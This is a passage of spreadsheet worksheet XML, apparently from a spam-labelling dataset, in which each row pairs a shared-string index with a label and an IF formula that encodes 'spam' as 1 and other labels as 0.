    <row r="2491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2491" t="s">
        <v>7682</v>
      </c>
      <c r="B2491" t="s">
        <v>5294</v>
      </c>
      <c r="C2491" s="1">
        <f>IF(B2491="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2492" t="s">
        <v>7683</v>
      </c>
      <c r="B2492" t="s">
        <v>5294</v>
      </c>
      <c r="C2492" s="1">
        <f>IF(B2492="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2493" t="s">
        <v>7684</v>
      </c>
      <c r="B2493" t="s">
        <v>5294</v>
      </c>
      <c r="C2493" s="1">
        <f>IF(B2493="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2494" t="s">
        <v>7685</v>
      </c>
      <c r="B2494" t="s">
        <v>5294</v>
      </c>
      <c r="C2494" s="1">
        <f>IF(B2494="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2495" t="s">
        <v>7686</v>
      </c>
      <c r="B2495" t="s">
        <v>5294</v>
      </c>
      <c r="C2495" s="1">
        <f>IF(B2495="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2496" t="s">
        <v>7687</v>
      </c>
      <c r="B2496" t="s">
        <v>5294</v>
      </c>
      <c r="C2496" s="1">
        <f>IF(B2496="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2497" t="s">
        <v>7688</v>
      </c>
      <c r="B2497" t="s">
        <v>5297</v>
      </c>
      <c r="C2497" s="1">
        <f>IF(B2497="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2498" t="s">
        <v>7689</v>
      </c>
      <c r="B2498" t="s">
        <v>5294</v>
      </c>
      <c r="C2498" s="1">
        <f>IF(B2498="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2499" t="s">
        <v>7690</v>
      </c>
      <c r="B2499" t="s">
        <v>5294</v>
      </c>
      <c r="C2499" s="1">
        <f>IF(B2499="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2500" t="s">
        <v>7691</v>
      </c>
      <c r="B2500" t="s">
        <v>5294</v>
      </c>
      <c r="C2500" s="1">
        <f>IF(B2500="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2501" t="s">
        <v>7692</v>
      </c>
      <c r="B2501" t="s">
        <v>5294</v>
      </c>
      <c r="C2501" s="1">
        <f>IF(B2501="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2502" t="s">
        <v>7693</v>
      </c>
      <c r="B2502" t="s">
        <v>5294</v>
      </c>
      <c r="C2502" s="1">
        <f>IF(B2502="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2503" t="s">
        <v>7694</v>
      </c>
      <c r="B2503" t="s">
        <v>5294</v>
      </c>
      <c r="C2503" s="1">
        <f>IF(B2503="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2504" t="s">
        <v>7695</v>
      </c>
      <c r="B2504" t="s">
        <v>5294</v>
      </c>
      <c r="C2504" s="1">
        <f>IF(B2504="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2505" t="s">
        <v>7696</v>
      </c>
      <c r="B2505" t="s">
        <v>5294</v>
      </c>
      <c r="C2505" s="1">
        <f>IF(B2505="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2506" t="s">
        <v>7697</v>
      </c>
      <c r="B2506" t="s">
        <v>5294</v>
      </c>
      <c r="C2506" s="1">
        <f>IF(B2506="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2507" t="s">
        <v>7698</v>
      </c>
      <c r="B2507" t="s">
        <v>5294</v>
      </c>
      <c r="C2507" s="1">
        <f>IF(B2507="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2508" t="s">
        <v>7699</v>
      </c>
      <c r="B2508" t="s">
        <v>5294</v>
      </c>
      <c r="C2508" s="1">
        <f>IF(B2508="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2509" t="s">
        <v>7700</v>
      </c>
      <c r="B2509" t="s">
        <v>5294</v>
      </c>
      <c r="C2509" s="1">
        <f>IF(B2509="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2510" t="s">
        <v>6531</v>
      </c>
      <c r="B2510" t="s">
        <v>5294</v>
      </c>
      <c r="C2510" s="1">
        <f>IF(B2510="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2511" t="s">
        <v>7701</v>
      </c>
      <c r="B2511" t="s">
        <v>5294</v>
      </c>
      <c r="C2511" s="1">
        <f>IF(B2511="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2512" t="s">
        <v>7702</v>
      </c>
      <c r="B2512" t="s">
        <v>5294</v>
      </c>
      <c r="C2512" s="1">
        <f>IF(B2512="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2513" t="s">
        <v>7703</v>
      </c>
      <c r="B2513" t="s">
        <v>5294</v>
      </c>
      <c r="C2513" s="1">
        <f>IF(B2513="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2514" t="s">
        <v>7704</v>
      </c>
      <c r="B2514" t="s">
        <v>5294</v>
      </c>
      <c r="C2514" s="1">
        <f>IF(B2514="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2515" t="s">
        <v>7705</v>
      </c>
      <c r="B2515" t="s">
        <v>5297</v>
      </c>
      <c r="C2515" s="1">
        <f>IF(B2515="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2516" t="s">
        <v>7706</v>
      </c>
      <c r="B2516" t="s">
        <v>5294</v>
      </c>
      <c r="C2516" s="1">
        <f>IF(B2516="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2517" t="s">
        <v>7707</v>
      </c>
      <c r="B2517" t="s">
        <v>5294</v>
      </c>
      <c r="C2517" s="1">
        <f>IF(B2517="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2518" t="s">
        <v>7708</v>
      </c>
      <c r="B2518" t="s">
        <v>5294</v>
      </c>
      <c r="C2518" s="1">
        <f>IF(B2518="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2519" t="s">
        <v>5376</v>
      </c>
      <c r="B2519" t="s">
        <v>5294</v>
      </c>
      <c r="C2519" s="1">
        <f>IF(B2519="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2520" t="s">
        <v>7002</v>
      </c>
      <c r="B2520" t="s">
        <v>5294</v>
      </c>
      <c r="C2520" s="1">
        <f>IF(B2520="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2521" t="s">
        <v>7709</v>
      </c>
      <c r="B2521" t="s">
        <v>5294</v>
      </c>
      <c r="C2521" s="1">
        <f>IF(B2521="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2522" t="s">
        <v>7710</v>
      </c>
      <c r="B2522" t="s">
        <v>5294</v>
      </c>
      <c r="C2522" s="1">
        <f>IF(B2522="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2523" t="s">
        <v>5376</v>
      </c>
      <c r="B2523" t="s">
        <v>5294</v>
      </c>
      <c r="C2523" s="1">
        <f>IF(B2523="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2524" t="s">
        <v>7711</v>
      </c>
      <c r="B2524" t="s">
        <v>5294</v>
      </c>
      <c r="C2524" s="1">
        <f>IF(B2524="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2525" t="s">
        <v>5376</v>
      </c>
      <c r="B2525" t="s">
        <v>5294</v>
      </c>
      <c r="C2525" s="1">
        <f>IF(B2525="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2526" t="s">
        <v>7712</v>
      </c>
      <c r="B2526" t="s">
        <v>5297</v>
      </c>
      <c r="C2526" s="1">
        <f>IF(B2526="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2527" t="s">
        <v>7090</v>
      </c>
      <c r="B2527" t="s">
        <v>5294</v>
      </c>
      <c r="C2527" s="1">
        <f>IF(B2527="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2528" t="s">
        <v>7713</v>
      </c>
      <c r="B2528" t="s">
        <v>5294</v>
      </c>
      <c r="C2528" s="1">
        <f>IF(B2528="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2529" t="s">
        <v>7714</v>
      </c>
      <c r="B2529" t="s">
        <v>5294</v>
      </c>
      <c r="C2529" s="1">
        <f>IF(B2529="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2530" t="s">
        <v>7715</v>
      </c>
      <c r="B2530" t="s">
        <v>5294</v>
      </c>
      <c r="C2530" s="1">
        <f>IF(B2530="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2531" t="s">
        <v>7716</v>
      </c>
      <c r="B2531" t="s">
        <v>5294</v>
      </c>
      <c r="C2531" s="1">
        <f>IF(B2531="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2532" t="s">
        <v>7717</v>
      </c>
      <c r="B2532" t="s">
        <v>5294</v>
      </c>
      <c r="C2532" s="1">
        <f>IF(B2532="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2533" t="s">
        <v>7718</v>
      </c>
      <c r="B2533" t="s">
        <v>5294</v>
      </c>
      <c r="C2533" s="1">
        <f>IF(B2533="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2534" t="s">
        <v>7719</v>
      </c>
      <c r="B2534" t="s">
        <v>5294</v>
      </c>
      <c r="C2534" s="1">
        <f>IF(B2534="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2535" t="s">
        <v>7720</v>
      </c>
      <c r="B2535" t="s">
        <v>5294</v>
      </c>
      <c r="C2535" s="1">
        <f>IF(B2535="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2536" t="s">
        <v>7721</v>
      </c>
      <c r="B2536" t="s">
        <v>5294</v>
      </c>
      <c r="C2536" s="1">
        <f>IF(B2536="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2537" t="s">
        <v>7722</v>
      </c>
      <c r="B2537" t="s">
        <v>5294</v>
      </c>
      <c r="C2537" s="1">
        <f>IF(B2537="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2538" t="s">
        <v>7723</v>
      </c>
      <c r="B2538" t="s">
        <v>5294</v>
      </c>
      <c r="C2538" s="1">
        <f>IF(B2538="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2539" t="s">
        <v>7724</v>
      </c>
      <c r="B2539" t="s">
        <v>5294</v>
      </c>
      <c r="C2539" s="1">
        <f>IF(B2539="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2540" t="s">
        <v>7725</v>
      </c>
      <c r="B2540" t="s">
        <v>5294</v>
      </c>
      <c r="C2540" s="1">
        <f>IF(B2540="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2541" t="s">
        <v>7726</v>
      </c>
      <c r="B2541" t="s">
        <v>5294</v>
      </c>
      <c r="C2541" s="1">
        <f>IF(B2541="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2542" t="s">
        <v>7727</v>
      </c>
      <c r="B2542" t="s">
        <v>5294</v>
      </c>
      <c r="C2542" s="1">
        <f>IF(B2542="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2543" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2543" t="s">
        <v>7728</v>
      </c>
      <c r="B2543" t="s">
        <v>5294</v>
      </c>
      <c r="C2543" s="1">
        <f>IF(B2543="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2544" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2544" t="s">
        <v>7729</v>
      </c>
      <c r="B2544" t="s">
        <v>5294</v>
      </c>
      <c r="C2544" s="1">
        <f>IF(B2544="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2545" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2545" t="s">
        <v>7730</v>
      </c>
      <c r="B2545" t="s">
        <v>5294</v>
      </c>
      <c r="C2545" s="1">
        <f>IF(B2545="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2546" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2546" t="s">
        <v>7731</v>
      </c>
      <c r="B2546" t="s">
        <v>5294</v>
      </c>
      <c r="C2546" s="1">
        <f>IF(B2546="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2547" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2547" t="s">
        <v>7732</v>
      </c>
      <c r="B2547" t="s">
        <v>5294</v>
      </c>
      <c r="C2547" s="1">
        <f>IF(B2547="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2548" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2548" t="s">
        <v>7733</v>
      </c>
      <c r="B2548" t="s">
        <v>5294</v>
      </c>
      <c r="C2548" s="1">
        <f>IF(B2548="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2549" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2549" t="s">
        <v>7734</v>
      </c>
      <c r="B2549" t="s">
        <v>5297</v>
      </c>
      <c r="C2549" s="1">
        <f>IF(B2549="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2550" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2550" t="s">
        <v>7735</v>
      </c>
      <c r="B2550" t="s">
        <v>5294</v>
      </c>
      <c r="C2550" s="1">
        <f>IF(B2550="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2551" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2551" t="s">
        <v>7736</v>
      </c>
      <c r="B2551" t="s">
        <v>5294</v>
      </c>
      <c r="C2551" s="1">
        <f>IF(B2551="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2552" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2552" t="s">
        <v>7737</v>
      </c>
      <c r="B2552" t="s">
        <v>5294</v>
      </c>
      <c r="C2552" s="1">
        <f>IF(B2552="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2553" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2553" t="s">
        <v>7738</v>
      </c>
      <c r="B2553" t="s">
        <v>5294</v>
      </c>
      <c r="C2553" s="1">
        <f>IF(B2553="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2554" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2554" t="s">
        <v>7739</v>
      </c>
      <c r="B2554" t="s">
        <v>5294</v>
      </c>
      <c r="C2554" s="1">
        <f>IF(B2554="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2555" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2555" t="s">
        <v>7740</v>
      </c>
      <c r="B2555" t="s">
        <v>5294</v>
      </c>
      <c r="C2555" s="1">
        <f>IF(B2555="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2556" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2556" t="s">
        <v>7741</v>
      </c>
      <c r="B2556" t="s">
        <v>5294</v>
      </c>
      <c r="C2556" s="1">
        <f>IF(B2556="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2557" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2557" t="s">
        <v>7742</v>
      </c>
      <c r="B2557" t="s">
        <v>5297</v>
      </c>
      <c r="C2557" s="1">
        <f>IF(B2557="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2558" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2558" t="s">
        <v>7743</v>
      </c>
      <c r="B2558" t="s">
        <v>5294</v>
      </c>
      <c r="C2558" s="1">
        <f>IF(B2558="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2559" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2559" t="s">
        <v>7744</v>
      </c>
      <c r="B2559" t="s">
        <v>5297</v>
      </c>
      <c r="C2559" s="1">
        <f>IF(B2559="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2560" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2560" t="s">
        <v>7745</v>
      </c>
      <c r="B2560" t="s">
        <v>5294</v>
      </c>
      <c r="C2560" s="1">
        <f>IF(B2560="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2561" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2561" t="s">
        <v>7746</v>
      </c>
      <c r="B2561" t="s">
        <v>5294</v>
      </c>
      <c r="C2561" s="1">
        <f>IF(B2561="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2562" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2562" t="s">
        <v>7747</v>
      </c>
      <c r="B2562" t="s">
        <v>5294</v>
      </c>
      <c r="C2562" s="1">
        <f>IF(B2562="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2563" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2563" t="s">
        <v>7748</v>
      </c>
      <c r="B2563" t="s">
        <v>5294</v>
      </c>
      <c r="C2563" s="1">
        <f>IF(B2563="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2564" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2564" t="s">
        <v>7749</v>
      </c>
      <c r="B2564" t="s">
        <v>5294</v>
      </c>
      <c r="C2564" s="1">
        <f>IF(B2564="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2565" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2565" t="s">
        <v>6481</v>
      </c>
      <c r="B2565" t="s">
        <v>5294</v>
      </c>
      <c r="C2565" s="1">
        <f>IF(B2565="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2566" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2566" t="s">
        <v>5945</v>
      </c>
      <c r="B2566" t="s">
        <v>5294</v>
      </c>
      <c r="C2566" s="1">
        <f>IF(B2566="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2567" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2567" t="s">
        <v>7750</v>
      </c>
      <c r="B2567" t="s">
        <v>5294</v>
      </c>
      <c r="C2567" s="1">
        <f>IF(B2567="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2568" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2568" t="s">
        <v>7751</v>
      </c>
      <c r="B2568" t="s">
        <v>5294</v>
      </c>
      <c r="C2568" s="1">
        <f>IF(B2568="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2569" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2569" t="s">
        <v>7752</v>
      </c>
      <c r="B2569" t="s">
        <v>5294</v>
      </c>
      <c r="C2569" s="1">
        <f>IF(B2569="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2570" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2570" t="s">
        <v>7753</v>
      </c>
      <c r="B2570" t="s">
        <v>5294</v>
      </c>
      <c r="C2570" s="1">
        <f>IF(B2570="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2571" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2571" t="s">
        <v>7754</v>
      </c>
      <c r="B2571" t="s">
        <v>5294</v>
      </c>
      <c r="C2571" s="1">
        <f>IF(B2571="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2572" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2572" t="s">
        <v>7755</v>
      </c>
      <c r="B2572" t="s">
        <v>5294</v>
      </c>
      <c r="C2572" s="1">
        <f>IF(B2572="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2573" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2573" t="s">
        <v>7756</v>
      </c>
      <c r="B2573" t="s">
        <v>5294</v>
      </c>
      <c r="C2573" s="1">
        <f>IF(B2573="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2574" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2574" t="s">
        <v>7757</v>
      </c>
      <c r="B2574" t="s">
        <v>5294</v>
      </c>
      <c r="C2574" s="1">
        <f>IF(B2574="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2575" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2575" t="s">
        <v>7758</v>
      </c>
      <c r="B2575" t="s">
        <v>5297</v>
      </c>
      <c r="C2575" s="1">
        <f>IF(B2575="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2576" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2576" t="s">
        <v>7759</v>
      </c>
      <c r="B2576" t="s">
        <v>5297</v>
      </c>
      <c r="C2576" s="1">
        <f>IF(B2576="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2577" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2577" t="s">
        <v>7760</v>
      </c>
      <c r="B2577" t="s">
        <v>5294</v>
      </c>
      <c r="C2577" s="1">
        <f>IF(B2577="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2578" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2578" t="s">
        <v>7761</v>
      </c>
      <c r="B2578" t="s">
        <v>5294</v>
      </c>
      <c r="C2578" s="1">
        <f>IF(B2578="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2579" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2579" t="s">
        <v>7762</v>
      </c>
      <c r="B2579" t="s">
        <v>5294</v>
      </c>
      <c r="C2579" s="1">
        <f>IF(B2579="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2580" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2580" t="s">
        <v>7763</v>
      </c>
      <c r="B2580" t="s">
        <v>5294</v>
      </c>
      <c r="C2580" s="1">
        <f>IF(B2580="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2581" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2581" t="s">
        <v>7764</v>
      </c>
      <c r="B2581" t="s">
        <v>5294</v>
      </c>
      <c r="C2581" s="1">
        <f>IF(B2581="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2582" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2582" t="s">
        <v>7765</v>
      </c>
      <c r="B2582" t="s">
        <v>5297</v>
      </c>
      <c r="C2582" s="1">
        <f>IF(B2582="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2583" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2583" t="s">
        <v>7766</v>
      </c>
      <c r="B2583" t="s">
        <v>5294</v>
      </c>
      <c r="C2583" s="1">
        <f>IF(B2583="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2584" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2584" t="s">
        <v>7767</v>
      </c>
      <c r="B2584" t="s">
        <v>5297</v>
      </c>
      <c r="C2584" s="1">
        <f>IF(B2584="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2585" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2585" t="s">
        <v>7768</v>
      </c>
      <c r="B2585" t="s">
        <v>5294</v>
      </c>
      <c r="C2585" s="1">
        <f>IF(B2585="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2586" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2586" t="s">
        <v>7769</v>
      </c>
      <c r="B2586" t="s">
        <v>5294</v>
      </c>
      <c r="C2586" s="1">
        <f>IF(B2586="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2587" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2587" t="s">
        <v>7770</v>
      </c>
      <c r="B2587" t="s">
        <v>5294</v>
      </c>
      <c r="C2587" s="1">
        <f>IF(B2587="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2588" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2588" t="s">
        <v>7771</v>
      </c>
      <c r="B2588" t="s">
        <v>5294</v>
      </c>
      <c r="C2588" s="1">
        <f>IF(B2588="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2589" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2589" t="s">
        <v>7772</v>
      </c>
      <c r="B2589" t="s">
        <v>5294</v>
      </c>
      <c r="C2589" s="1">
        <f>IF(B2589="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2590" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2590" t="s">
        <v>7773</v>
      </c>
      <c r="B2590" t="s">
        <v>5294</v>
      </c>
      <c r="C2590" s="1">
        <f>IF(B2590="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2591" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2591" t="s">
        <v>7774</v>
      </c>
      <c r="B2591" t="s">
        <v>5297</v>
      </c>
      <c r="C2591" s="1">
        <f>IF(B2591="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2592" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2592" t="s">
        <v>7775</v>
      </c>
      <c r="B2592" t="s">
        <v>5294</v>
      </c>
      <c r="C2592" s="1">
        <f>IF(B2592="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2593" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2593" t="s">
        <v>7776</v>
      </c>
      <c r="B2593" t="s">
        <v>5294</v>
      </c>
      <c r="C2593" s="1">
        <f>IF(B2593="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2594" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2594" t="s">
        <v>7777</v>
      </c>
      <c r="B2594" t="s">
        <v>5294</v>
      </c>
      <c r="C2594" s="1">
        <f>IF(B2594="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
